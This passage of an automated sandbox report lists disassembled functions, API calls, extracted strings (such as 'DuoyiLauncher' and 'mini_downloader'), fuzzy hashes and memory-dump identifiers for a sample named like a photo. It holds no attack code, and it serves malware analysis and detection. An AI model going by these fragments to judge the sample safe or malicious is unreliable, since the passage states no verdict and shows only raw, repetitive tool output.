                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Object$Select_memset$CreateDeleteFontIndirectMetricsStockText_wcsncpy
                                                                • String ID:
                                                                • API String ID: 834914290-0
                                                                • Opcode ID: 3de57d91f3e6e2c9b5822e56f54ba4e691bc8a13ab585edff77bea35a6b7fcd6
                                                                • Instruction ID: dd96fce19e70d47440716eb19c2fc3496627ca6f3b96bbcd368ac024d63c256e
                                                                • Opcode Fuzzy Hash: 3de57d91f3e6e2c9b5822e56f54ba4e691bc8a13ab585edff77bea35a6b7fcd6
                                                                • Instruction Fuzzy Hash: 6331B231900788AFDB10DFB5CC09BDFBBF8AB05304F04441EE95A97291D7B4A949CB25
                                                                Function 004596F0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 247COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strlen.LIBCMT ref: 0045977B
                                                                • InitializeCriticalSection.KERNEL32(00632228,?,?,?,00000000,00000001,00000000,00000000,00000000), ref: 00459865
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00459898
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 004598C7
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 0045994E
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00459987
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 004599BB
                                                                Strings
                                                                • util\ProtoValueJsonConvertor.cpp, xrefs: 00459909
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterInitializeLeave$_malloc_strlen
                                                                • String ID: util\ProtoValueJsonConvertor.cpp
                                                                • API String ID: 3296675288-1093228576
                                                                • Opcode ID: 50f5f3c272f2030bc649d484101042e8cad23868fce4f14487f2b5623be58926
                                                                • Instruction ID: e55821ebbedafda53c0084b64b94bb782fbcef9bc572d58d473d94498ed3d619
                                                                • Opcode Fuzzy Hash: 50f5f3c272f2030bc649d484101042e8cad23868fce4f14487f2b5623be58926
                                                                • Instruction Fuzzy Hash: E3A123B1D00349EBEB00EF94ED41B9EBBB5BB05304F0445AFE90563282D7795A48CFA6
                                                                Function 0045E480 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 244COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_strlenstd::exception::exception
                                                                • String ID: _
                                                                • API String ID: 3463043144-2179862614
                                                                • Opcode ID: f85cbb86b66569a7a7a5cf9dd952e7b2138fe9f9d75ab533b3ef66d469d4e9a1
                                                                • Instruction ID: d7513ec4cd069e3a49a051329f51f90cdf4374b9b92c52fd5bd7a50e3589f5b1
                                                                • Opcode Fuzzy Hash: f85cbb86b66569a7a7a5cf9dd952e7b2138fe9f9d75ab533b3ef66d469d4e9a1
                                                                • Instruction Fuzzy Hash: 7DA19074900208DFCB18DF96C480AAEBBB1FF49309F64415FE8169B392D739DA46CB95
                                                                Function 0042581E Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 222COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0042583D
                                                                • _memset.LIBCMT ref: 0042584C
                                                                  • Part of subcall function 0042603A: _wcsncpy.LIBCMT ref: 00426049
                                                                  • Part of subcall function 0042603A: _wcsncpy.LIBCMT ref: 00426069
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset_wcsncpy
                                                                • String ID: Error parsing element name$Expected end-tag start$Expected start tag$Expected start-tag closing$Unmatched closing tag
                                                                • API String ID: 1825577869-2540963027
                                                                • Opcode ID: cabe7e6df192b74d968219195ab75398cd7c50eb13500ef82826adfe12c434ea
                                                                • Instruction ID: 6ae710059bb4244efcd88598dd3dba5200d8d094742f4ca7cf7b3d2bbf6138f1
                                                                • Opcode Fuzzy Hash: cabe7e6df192b74d968219195ab75398cd7c50eb13500ef82826adfe12c434ea
                                                                • Instruction Fuzzy Hash: 3D81C231E00628EFCF14EFA5D5869AEB3B4FF04304B91819BE801AB251D7789F45DB99
                                                                Function 00408D1F Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 171COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00408D29
                                                                  • Part of subcall function 00403528: __EH_prolog3.LIBCMT ref: 0040352F
                                                                  • Part of subcall function 00403528: SysFreeString.OLEAUT32(00000000), ref: 00403543
                                                                  • Part of subcall function 00403528: SysAllocStringLen.OLEAUT32(-00000002,?), ref: 0040355A
                                                                  • Part of subcall function 00403528: SysFreeString.OLEAUT32(00000000), ref: 0040356F
                                                                  • Part of subcall function 00401560: _memmove.LIBCMT ref: 00401581
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                  • Part of subcall function 00402EF7: __EH_prolog3.LIBCMT ref: 00402EFE
                                                                  • Part of subcall function 00450110: _wcslen.LIBCMT ref: 00450184
                                                                  • Part of subcall function 0044F690: _strlen.LIBCMT ref: 0044F75E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: String$FreeH_prolog3_memmove_wcslen$AllocH_prolog3__strlen
                                                                • String ID: %s|GameId:%d$1.0.2|mini_downloader$channel_id$channel_type$edition_type$info_version$stats_col
                                                                • API String ID: 2953664077-687930928
                                                                • Opcode ID: fa61f3339d27bb612320d5133c4e6732dfc0effeeec9f965a10ac5fa9d7c74c2
                                                                • Instruction ID: d52a48b825f23ff8918cabd3dfed0d9a925d386940499520107eab8a2dd056d7
                                                                • Opcode Fuzzy Hash: fa61f3339d27bb612320d5133c4e6732dfc0effeeec9f965a10ac5fa9d7c74c2
                                                                • Instruction Fuzzy Hash: A561E731E0024CDBDF10EBA5C8557DEBBB9AF41308F5440AEE548B7282DE786E49CB65
                                                                Function 00483500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00483520
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890BA
                                                                  • Part of subcall function 004890A5: __CxxThrowException@8.LIBCMT ref: 004890CF
                                                                  • Part of subcall function 004890A5: std::exception::exception.LIBCMT ref: 004890E0
                                                                • _memmove.LIBCMT ref: 004835A7
                                                                • _memmove.LIBCMT ref: 004835CB
                                                                • _memmove.LIBCMT ref: 00483605
                                                                • _memmove.LIBCMT ref: 00483621
                                                                • std::exception::exception.LIBCMT ref: 0048366B
                                                                • __CxxThrowException@8.LIBCMT ref: 00483680
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                • String ID: deque<T> too long
                                                                • API String ID: 827257264-309773918
                                                                • Opcode ID: 6ccf36a1ffbe366309450b511acf877f9b22063fd51477a2ed103e02d8d20af1
                                                                • Instruction ID: 224444bc1bdd15321a94016242796a968fcfae91ac3b8869ecbb05f2990ab1c9
                                                                • Opcode Fuzzy Hash: 6ccf36a1ffbe366309450b511acf877f9b22063fd51477a2ed103e02d8d20af1
                                                                • Instruction Fuzzy Hash: 9641D7B2E00105ABDF14EE68CC81AAEB7E5EF80714F1D896AEC04D7305F678EE418794
                                                                Function 0046EA00 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 0046EAA1
                                                                • __CxxThrowException@8.LIBCMT ref: 0046EAB6
                                                                • std::exception::exception.LIBCMT ref: 0046EAC5
                                                                • __CxxThrowException@8.LIBCMT ref: 0046EADA
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3C7
                                                                  • Part of subcall function 0048A378: std::exception::exception.LIBCMT ref: 0048A3E1
                                                                  • Part of subcall function 0048A378: __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                • String ID: @Mc$@Mc$@Mc$PMc
                                                                • API String ID: 2621100827-493132592
                                                                • Opcode ID: 92645d815f3a4cb4c495963ef933f9fe819f889e0028339647bbf0c1873e0635
                                                                • Instruction ID: 0751f91bf27cbc414569d5c8ff7ab4af59fedd3755de6409a3065bc6f7a6c62d
                                                                • Opcode Fuzzy Hash: 92645d815f3a4cb4c495963ef933f9fe819f889e0028339647bbf0c1873e0635
                                                                • Instruction Fuzzy Hash: 11418BB1900214AFCB11DF98ED41A9EFBF9FB08744F00456EE8159B750EB79AA04CBD6
                                                                Function 00450E70 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 119threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • InitializeCriticalSection.KERNEL32(00632054,?,1.0.2|mini_downloader,00000000,000000FF,?,?,?), ref: 00450ECD
                                                                • std::exception::exception.LIBCMT ref: 00450EE7
                                                                • __CxxThrowException@8.LIBCMT ref: 00450EFC
                                                                • GetExitCodeThread.KERNEL32(00000000,3D09168B,3D09168B,00000000,006111F0), ref: 00450F5D
                                                                • CloseHandle.KERNEL32(00000000), ref: 00450F77
                                                                • DeleteCriticalSection.KERNEL32(00632054,3D09168B,00000000,006111F0), ref: 00450F9C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$CloseCodeDeleteException@8ExitHandleInitializeThreadThrow_mallocstd::exception::exception
                                                                • String ID: 8 c$8 c
                                                                • API String ID: 2533082262-2613683425
                                                                • Opcode ID: 97ab6a139e8c269cb1e10c995335c2c8733bcfc0327e9a0514d8c2d8b5ca4e66
                                                                • Instruction ID: df4369228ce657cdceab46be3a459c4851a60d4c6b82f28e0f8284515238953c
                                                                • Opcode Fuzzy Hash: 97ab6a139e8c269cb1e10c995335c2c8733bcfc0327e9a0514d8c2d8b5ca4e66
                                                                • Instruction Fuzzy Hash: 8841C0B1A00306DFCB18EF68EC95A5A7BB6F714304F00496EE90997361D7B9990CCFA5
                                                                Function 00429D61 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00429D68
                                                                  • Part of subcall function 0043314E: __EH_prolog3.LIBCMT ref: 00433155
                                                                  • Part of subcall function 0043314E: _memset.LIBCMT ref: 004331B7
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _memset.LIBCMT ref: 00429E70
                                                                • _memset.LIBCMT ref: 00429E98
                                                                • _memset.LIBCMT ref: 00429EA7
                                                                • _memset.LIBCMT ref: 00429EB6
                                                                • std::exception::exception.LIBCMT ref: 00429EEB
                                                                • __CxxThrowException@8.LIBCMT ref: 00429F00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$H_prolog3$Exception@8Throw_mallocstd::exception::exception
                                                                • String ID: h_
                                                                • API String ID: 2278712146-2244067138
                                                                • Opcode ID: d2acecfc184fd993ee60632eed93f9ae95e399801ebfccf7eda35d283d8d677c
                                                                • Instruction ID: 150a71bf38ad35189088f4053f41c317c0d1d22a1b637c0464db0d13c4b11479
                                                                • Opcode Fuzzy Hash: d2acecfc184fd993ee60632eed93f9ae95e399801ebfccf7eda35d283d8d677c
                                                                • Instruction Fuzzy Hash: 434149B1604B449ED320DFB98845BCBFBE8AF1A304F40481FA5AE87651D7B87544CB66
                                                                Function 00409F6D Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00409F77
                                                                  • Part of subcall function 00448D00: CoInitialize.OLE32(00000000), ref: 00448D5A
                                                                  • Part of subcall function 00448D00: SHGetSpecialFolderLocation.SHELL32(00000000,?,00000000), ref: 00448D72
                                                                  • Part of subcall function 00448D00: SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00448D8A
                                                                  • Part of subcall function 00448D00: _wcslen.LIBCMT ref: 00448D9B
                                                                  • Part of subcall function 00448D00: CoTaskMemFree.OLE32(00000000), ref: 00448DB9
                                                                  • Part of subcall function 00448D00: CoUninitialize.OLE32 ref: 00448DBF
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                • _wcslen.LIBCMT ref: 00409FC2
                                                                • _memset.LIBCMT ref: 00409FEC
                                                                • WritePrivateProfileStringW.KERNEL32(Config,ZMINTLanguage,?,?), ref: 0040A041
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$FolderFreeFromH_prolog3_InitializeListLocationPathPrivateProfileSpecialStringTaskUninitializeWrite_memmove_memset
                                                                • String ID: Config$ZMINTLanguage$\DuoyiLauncher$\config_usr\permanent_config.ini
                                                                • API String ID: 1432320124-3478884248
                                                                • Opcode ID: 5be74ebd8a7bf7792d656fc35e18acc83bf421140ba4999c5171631fef521af8
                                                                • Instruction ID: 2a922f69604712511a5d1d5b562e2fe72ffa515f18f871dd0b7c89330163b877
                                                                • Opcode Fuzzy Hash: 5be74ebd8a7bf7792d656fc35e18acc83bf421140ba4999c5171631fef521af8
                                                                • Instruction Fuzzy Hash: 1421417194021CAAEB10FB65DC4AFDE77B8AF10308F0044AAF509B7191DB786F84CB99
                                                                Function 004072AE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 004072BE
                                                                • _memset.LIBCMT ref: 004072D1
                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004072ED
                                                                • GetLastError.KERNEL32 ref: 004072F7
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407304
                                                                • CloseHandle.KERNEL32(?), ref: 00407313
                                                                • CloseHandle.KERNEL32(?), ref: 00407318
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
